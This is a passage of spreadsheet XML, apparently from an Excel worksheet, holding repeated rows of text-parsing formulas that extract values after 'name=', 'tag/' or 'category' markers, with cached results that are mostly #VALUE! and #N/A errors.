    ISNUMBER(FIND("category",$A3977)), MID($A3977, FIND("category",$A3977) + 9, LEN($A3977) - FIND("category",$A3977)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3977" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3978" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3978" t="s">
        <v>2618</v>
      </c>
      <c r="B3978" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3978" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3978" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3978" t="e" cm="1">
        <f t="array" ref="E3978">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3978)), MID($A3978, FIND("name=",$A3978) + 5, LEN($A3978) - FIND("name=",$A3978)),
    ISNUMBER(FIND("tag/",$A3978)), MID($A3978, FIND("tag/",$A3978) + 4, LEN($A3978) - FIND("tag/",$A3978)),
    ISNUMBER(FIND("category",$A3978)), MID($A3978, FIND("category",$A3978) + 9, LEN($A3978) - FIND("category",$A3978)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3978" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3979" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3979" t="s">
        <v>2620</v>
      </c>
      <c r="B3979" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3979" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3979" t="e">
        <f t="shared" ref="D3979:D4042" si="189">IF(FIND("category",$A3979,1)&gt;0,MID($A3979,FIND("category",$A3979,1)+9,LEN($A3979)-FIND("category",$A3979,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E3979" t="e" cm="1">
        <f t="array" ref="E3979">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3979)), MID($A3979, FIND("name=",$A3979) + 5, LEN($A3979) - FIND("name=",$A3979)),
    ISNUMBER(FIND("tag/",$A3979)), MID($A3979, FIND("tag/",$A3979) + 4, LEN($A3979) - FIND("tag/",$A3979)),
    ISNUMBER(FIND("category",$A3979)), MID($A3979, FIND("category",$A3979) + 9, LEN($A3979) - FIND("category",$A3979)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3979" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3980" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3980" t="s">
        <v>2621</v>
      </c>
      <c r="B3980" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3980" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3980" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3980" t="e" cm="1">
        <f t="array" ref="E3980">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3980)), MID($A3980, FIND("name=",$A3980) + 5, LEN($A3980) - FIND("name=",$A3980)),
    ISNUMBER(FIND("tag/",$A3980)), MID($A3980, FIND("tag/",$A3980) + 4, LEN($A3980) - FIND("tag/",$A3980)),
    ISNUMBER(FIND("category",$A3980)), MID($A3980, FIND("category",$A3980) + 9, LEN($A3980) - FIND("category",$A3980)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3980" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3981" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3981" t="s">
        <v>2622</v>
      </c>
      <c r="B3981" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3981" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3981" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3981" t="e" cm="1">
        <f t="array" ref="E3981">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3981)), MID($A3981, FIND("name=",$A3981) + 5, LEN($A3981) - FIND("name=",$A3981)),
    ISNUMBER(FIND("tag/",$A3981)), MID($A3981, FIND("tag/",$A3981) + 4, LEN($A3981) - FIND("tag/",$A3981)),
    ISNUMBER(FIND("category",$A3981)), MID($A3981, FIND("category",$A3981) + 9, LEN($A3981) - FIND("category",$A3981)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3981" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3982" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3982" t="s">
        <v>2623</v>
      </c>
      <c r="B3982" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3982" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3982" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3982" t="e" cm="1">
        <f t="array" ref="E3982">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3982)), MID($A3982, FIND("name=",$A3982) + 5, LEN($A3982) - FIND("name=",$A3982)),
    ISNUMBER(FIND("tag/",$A3982)), MID($A3982, FIND("tag/",$A3982) + 4, LEN($A3982) - FIND("tag/",$A3982)),
    ISNUMBER(FIND("category",$A3982)), MID($A3982, FIND("category",$A3982) + 9, LEN($A3982) - FIND("category",$A3982)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3982" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3983" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3983" t="s">
        <v>2624</v>
      </c>
      <c r="B3983" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3983" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3983" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3983" t="e" cm="1">
        <f t="array" ref="E3983">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3983)), MID($A3983, FIND("name=",$A3983) + 5, LEN($A3983) - FIND("name=",$A3983)),
    ISNUMBER(FIND("tag/",$A3983)), MID($A3983, FIND("tag/",$A3983) + 4, LEN($A3983) - FIND("tag/",$A3983)),
    ISNUMBER(FIND("category",$A3983)), MID($A3983, FIND("category",$A3983) + 9, LEN($A3983) - FIND("category",$A3983)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3983" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3984" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3984" t="s">
        <v>2625</v>
      </c>
      <c r="B3984" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3984" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3984" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3984" t="e" cm="1">
        <f t="array" ref="E3984">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3984)), MID($A3984, FIND("name=",$A3984) + 5, LEN($A3984) - FIND("name=",$A3984)),
    ISNUMBER(FIND("tag/",$A3984)), MID($A3984, FIND("tag/",$A3984) + 4, LEN($A3984) - FIND("tag/",$A3984)),
    ISNUMBER(FIND("category",$A3984)), MID($A3984, FIND("category",$A3984) + 9, LEN($A3984) - FIND("category",$A3984)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3984" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3985" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3985" t="s">
        <v>2626</v>
      </c>
      <c r="B3985" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3985" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3985" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3985" t="e" cm="1">
        <f t="array" ref="E3985">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3985)), MID($A3985, FIND("name=",$A3985) + 5, LEN($A3985) - FIND("name=",$A3985)),
    ISNUMBER(FIND("tag/",$A3985)), MID($A3985, FIND("tag/",$A3985) + 4, LEN($A3985) - FIND("tag/",$A3985)),
    ISNUMBER(FIND("category",$A3985)), MID($A3985, FIND("category",$A3985) + 9, LEN($A3985) - FIND("category",$A3985)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3985" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3986" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3986" t="s">
        <v>2627</v>
      </c>
      <c r="B3986" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3986" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3986" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3986" t="e" cm="1">
        <f t="array" ref="E3986">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3986)), MID($A3986, FIND("name=",$A3986) + 5, LEN($A3986) - FIND("name=",$A3986)),
    ISNUMBER(FIND("tag/",$A3986)), MID($A3986, FIND("tag/",$A3986) + 4, LEN($A3986) - FIND("tag/",$A3986)),
    ISNUMBER(FIND("category",$A3986)), MID($A3986, FIND("category",$A3986) + 9, LEN($A3986) - FIND("category",$A3986)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3986" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3987" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3987" t="s">
        <v>2628</v>
      </c>
      <c r="B3987" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3987" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3987" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3987" t="e" cm="1">
        <f t="array" ref="E3987">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3987)), MID($A3987, FIND("name=",$A3987) + 5, LEN($A3987) - FIND("name=",$A3987)),
    ISNUMBER(FIND("tag/",$A3987)), MID($A3987, FIND("tag/",$A3987) + 4, LEN($A3987) - FIND("tag/",$A3987)),
    ISNUMBER(FIND("category",$A3987)), MID($A3987, FIND("category",$A3987) + 9, LEN($A3987) - FIND("category",$A3987)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3987" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3988" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3988" t="s">
        <v>2629</v>
      </c>
      <c r="B3988" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3988" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3988" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3988" t="e" cm="1">
        <f t="array" ref="E3988">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3988)), MID($A3988, FIND("name=",$A3988) + 5, LEN($A3988) - FIND("name=",$A3988)),
    ISNUMBER(FIND("tag/",$A3988)), MID($A3988, FIND("tag/",$A3988) + 4, LEN($A3988) - FIND("tag/",$A3988)),
    ISNUMBER(FIND("category",$A3988)), MID($A3988, FIND("category",$A3988) + 9, LEN($A3988) - FIND("category",$A3988)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3988" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3989" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3989" t="s">
        <v>2630</v>
      </c>
      <c r="B3989" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3989" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3989" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3989" t="e" cm="1">
        <f t="array" ref="E3989">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3989)), MID($A3989, FIND("name=",$A3989) + 5, LEN($A3989) - FIND("name=",$A3989)),
    ISNUMBER(FIND("tag/",$A3989)), MID($A3989, FIND("tag/",$A3989) + 4, LEN($A3989) - FIND("tag/",$A3989)),
    ISNUMBER(FIND("category",$A3989)), MID($A3989, FIND("category",$A3989) + 9, LEN($A3989) - FIND("category",$A3989)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3989" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3990" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3990" t="s">
        <v>2631</v>
      </c>
      <c r="B3990" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3990" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3990" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3990" t="e" cm="1">
        <f t="array" ref="E3990">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3990)), MID($A3990, FIND("name=",$A3990) + 5, LEN($A3990) - FIND("name=",$A3990)),
    ISNUMBER(FIND("tag/",$A3990)), MID($A3990, FIND("tag/",$A3990) + 4, LEN($A3990) - FIND("tag/",$A3990)),
    ISNUMBER(FIND("category",$A3990)), MID($A3990, FIND("category",$A3990) + 9, LEN($A3990) - FIND("category",$A3990)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3990" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3991" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3991" t="s">
        <v>2632</v>
      </c>
      <c r="B3991" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3991" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3991" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3991" t="e" cm="1">
        <f t="array" ref="E3991">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3991)), MID($A3991, FIND("name=",$A3991) + 5, LEN($A3991) - FIND("name=",$A3991)),
    ISNUMBER(FIND("tag/",$A3991)), MID($A3991, FIND("tag/",$A3991) + 4, LEN($A3991) - FIND("tag/",$A3991)),
    ISNUMBER(FIND("category",$A3991)), MID($A3991, FIND("category",$A3991) + 9, LEN($A3991) - FIND("category",$A3991)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3991" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3992" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3992" t="s">
        <v>2633</v>
      </c>
      <c r="B3992" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3992" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3992" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3992" t="e" cm="1">
        <f t="array" ref="E3992">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3992)), MID($A3992, FIND("name=",$A3992) + 5, LEN($A3992) - FIND("name=",$A3992)),
    ISNUMBER(FIND("tag/",$A3992)), MID($A3992, FIND("tag/",$A3992) + 4, LEN($A3992) - FIND("tag/",$A3992)),
    ISNUMBER(FIND("category",$A3992)), MID($A3992, FIND("category",$A3992) + 9, LEN($A3992) - FIND("category",$A3992)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3992" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3993" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3993" t="s">
        <v>2634</v>
      </c>
      <c r="B3993" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3993" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3993" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3993" t="e" cm="1">
        <f t="array" ref="E3993">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3993)), MID($A3993, FIND("name=",$A3993) + 5, LEN($A3993) - FIND("name=",$A3993)),
    ISNUMBER(FIND("tag/",$A3993)), MID($A3993, FIND("tag/",$A3993) + 4, LEN($A3993) - FIND("tag/",$A3993)),
    ISNUMBER(FIND("category",$A3993)), MID($A3993, FIND("category",$A3993) + 9, LEN($A3993) - FIND("category",$A3993)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3993" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3994" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3994" t="s">
        <v>2635</v>
      </c>
      <c r="B3994" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3994" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3994" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3994" t="e" cm="1">
        <f t="array" ref="E3994">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3994)), MID($A3994, FIND("name=",$A3994) + 5, LEN($A3994) - FIND("name=",$A3994)),
    ISNUMBER(FIND("tag/",$A3994)), MID($A3994, FIND("tag/",$A3994) + 4, LEN($A3994) - FIND("tag/",$A3994)),
    ISNUMBER(FIND("category",$A3994)), MID($A3994, FIND("category",$A3994) + 9, LEN($A3994) - FIND("category",$A3994)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3994" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3995" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3995" t="s">
        <v>2636</v>
      </c>
      <c r="B3995" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3995" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3995" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3995" t="e" cm="1">
        <f t="array" ref="E3995">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3995)), MID($A3995, FIND("name=",$A3995) + 5, LEN($A3995) - FIND("name=",$A3995)),
    ISNUMBER(FIND("tag/",$A3995)), MID($A3995, FIND("tag/",$A3995) + 4, LEN($A3995) - FIND("tag/",$A3995)),
    ISNUMBER(FIND("category",$A3995)), MID($A3995, FIND("category",$A3995) + 9, LEN($A3995) - FIND("category",$A3995)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3995" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3996" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3996" t="s">
        <v>2637</v>
      </c>
      <c r="B3996" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3996" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3996" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3996" t="e" cm="1">
        <f t="array" ref="E3996">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3996)), MID($A3996, FIND("name=",$A3996) + 5, LEN($A3996) - FIND("name=",$A3996)),
    ISNUMBER(FIND("tag/",$A3996)), MID($A3996, FIND("tag/",$A3996) + 4, LEN($A3996) - FIND("tag/",$A3996)),
    ISNUMBER(FIND("category",$A3996)), MID($A3996, FIND("category",$A3996) + 9, LEN($A3996) - FIND("category",$A3996)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3996" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3997" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3997" t="s">
        <v>2638</v>
      </c>
      <c r="B3997" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3997" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3997" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3997" t="e" cm="1">
        <f t="array" ref="E3997">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3997)), MID($A3997, FIND("name=",$A3997) + 5, LEN($A3997) - FIND("name=",$A3997)),
    ISNUMBER(FIND("tag/",$A3997)), MID($A3997, FIND("tag/",$A3997) + 4, LEN($A3997) - FIND("tag/",$A3997)),
    ISNUMBER(FIND("category",$A3997)), MID($A3997, FIND("category",$A3997) + 9, LEN($A3997) - FIND("category",$A3997)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3997" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3998" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3998" t="s">
        <v>2639</v>
      </c>
      <c r="B3998" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3998" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3998" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3998" t="e" cm="1">
        <f t="array" ref="E3998">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3998)), MID($A3998, FIND("name=",$A3998) + 5, LEN($A3998) - FIND("name=",$A3998)),
    ISNUMBER(FIND("tag/",$A3998)), MID($A3998, FIND("tag/",$A3998) + 4, LEN($A3998) - FIND("tag/",$A3998)),
    ISNUMBER(FIND("category",$A3998)), MID($A3998, FIND("category",$A3998) + 9, LEN($A3998) - FIND("category",$A3998)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3998" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3999" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3999" t="s">
        <v>2640</v>
      </c>
      <c r="B3999" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3999" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3999" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3999" t="e" cm="1">
        <f t="array" ref="E3999">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3999)), MID($A3999, FIND("name=",$A3999) + 5, LEN($A3999) - FIND("name=",$A3999)),
    ISNUMBER(FIND("tag/",$A3999)), MID($A3999, FIND("tag/",$A3999) + 4, LEN($A3999) - FIND("tag/",$A3999)),
    ISNUMBER(FIND("category",$A3999)), MID($A3999, FIND("category",$A3999) + 9, LEN($A3999) - FIND("category",$A3999)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3999" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="4000" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A4000" t="s">
        <v>2641</v>
      </c>
      <c r="B4000" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C4000" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D4000" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E4000" t="e" cm="1">
        <f t="array" ref="E4000">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A4000)), MID($A4000, FIND("name=",$A4000) + 5, LEN($A4000) - FIND("name=",$A4000)),
    ISNUMBER(FIND("tag/",$A4000)), MID($A4000, FIND("tag/",$A4000) + 4, LEN($A4000) - FIND("tag/",$A4000)),
    ISNUMBER(FIND("category",$A4000)), MID($A4000, FIND("category",$A4000) + 9, LEN($A4000) - FIND("category",$A4000)))</f>
        <v>#N/A</v>
      </c>
      <c r="F4000" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="4001" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A4001" t="s">
        <v>2642</v>
      </c>
      <c r="B4001" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C4001" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D4001" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E4001" t="e" cm="1">
        <f t="array" ref="E4001">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A4001)), MID($A4001, FIND("name=",$A4001) + 5, LEN($A4001) - FIND("name=",$A4001)),
    ISNUMBER(FIND("tag/",$A4001)), MID($A4001, FIND("tag/",$A4001) + 4, LEN($A4001) - FIND("tag/",$A4001)),
    ISNUMBER(FIND("category",$A4001)), MID($A4001, FIND("category",$A4001) + 9, LEN($A4001) - FIND("category",$A4001)))</f>
        <v>#N/A</v>
      </c>
      <c r="F4001" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="4002" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A4002" t="s">
        <v>2643</v>
      </c>
      <c r="B4002" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C4002" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D4002" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E4002" t="e" cm="1">
        <f t="array" ref="E4002">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A4002)), MID($A4002, FIND("name=",$A4002) + 5, LEN($A4002) - FIND("name=",$A4002)),
    ISNUMBER(FIND("tag/",$A4002)), MID($A4002, FIND("tag/",$A4002) + 4, LEN($A4002) - FIND("tag/",$A4002)),
    ISNUMBER(FIND("category",$A4002)), MID($A4002, FIND("category",$A4002) + 9, LEN($A4002) - FIND("category",$A4002)))</f>
        <v>#N/A</v>
      </c>
      <c r="F4002" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="4003" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A4003" t="s">
        <v>2644</v>
      </c>
      <c r="B4003" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C4003" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D4003" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E4003" t="e" cm="1">
        <f t="array" ref="E4003">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A4003)), MID($A4003, FIND("name=",$A4003) + 5, LEN($A4003) - FIND("name=",$A4003)),
    ISNUMBER(FIND("tag/",$A4003)), MID($A4003, FIND("tag/",$A4003) + 4, LEN($A4003) - FIND("tag/",$A4003)),
    ISNUMBER(FIND("category",$A4003)), MID($A4003, FIND("category",$A4003) + 9, LEN($A4003) - FIND("category",$A4003)))</f>
        <v>#N/A</v>
      </c>
      <c r="F4003" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="4004" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A4004" t="s">
        <v>2645</v>
      </c>
      <c r="B4004" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C4004" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D4004" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E4004" t="e" cm="1">
        <f t="array" ref="E4004">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A4004)), MID($A4004, FIND("name=",$A4004) + 5, LEN($A4004) - FIND("name=",$A4004)),
    ISNUMBER(FIND("tag/",$A4004)), MID($A4004, FIND("tag/",$A4004) + 4, LEN($A4004) - FIND("tag/",$A4004)),
    ISNUMBER(FIND("category",$A4004)), MID($A4004, FIND("category",$A4004) + 9, LEN($A4004) - FIND("category",$A4004)))</f>
        <v>#N/A</v>
      </c>
      <c r="F4004" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="4005" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A4005" t="s">
        <v>2646</v>
      </c>
      <c r="B4005" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C4005" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D4005" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E4005" t="e" cm="1">
        <f t="array" ref="E4005">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A4005)), MID($A4005, FIND("name=",$A4005) + 5, LEN($A4005) - FIND("name=",$A4005)),
    ISNUMBER(FIND("tag/",$A4005)), MID($A4005, FIND("tag/",$A4005) + 4, LEN($A4005) - FIND("tag/",$A4005)),
    ISNUMBER(FIND("category",$A4005)), MID($A4005, FIND("category",$A4005) + 9, LEN($A4005) - FIND("category",$A4005)))</f>
        <v>#N/A</v>
      </c>
      <c r="F4005" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="4006" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A4006" t="s">
        <v>2647</v>
      </c>
      <c r="B4006" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C4006" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D4006" t="e">
        <f t="shared" si="189"/>
        <v>#VALUE!</v>
      </c>
      <c r="E4006" t="e" cm="1">
        <f t="array" ref="E4006">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A4006)), MID($A4006, FIND("name=",$A4006) + 5, LEN($A4006) - FIND("name=",$A4006)),
    ISNUMBER(FIND("tag/",$A4006)), MID($A4006, FIND("tag/",$A4006) + 4, LEN($A4006) - FIND("tag/",$A4006)),
    ISNUMBER(FIND("category",$A4006)), MID($A4006, FIND("category",$A4006) + 9, LEN($A4006) - FIND("category",$A4006)))</f>
        <v>#N/A</v>
      </c>
      <c r="F4006" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="4007" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A4007" t="s">
        <v>2648</v>
      </c>
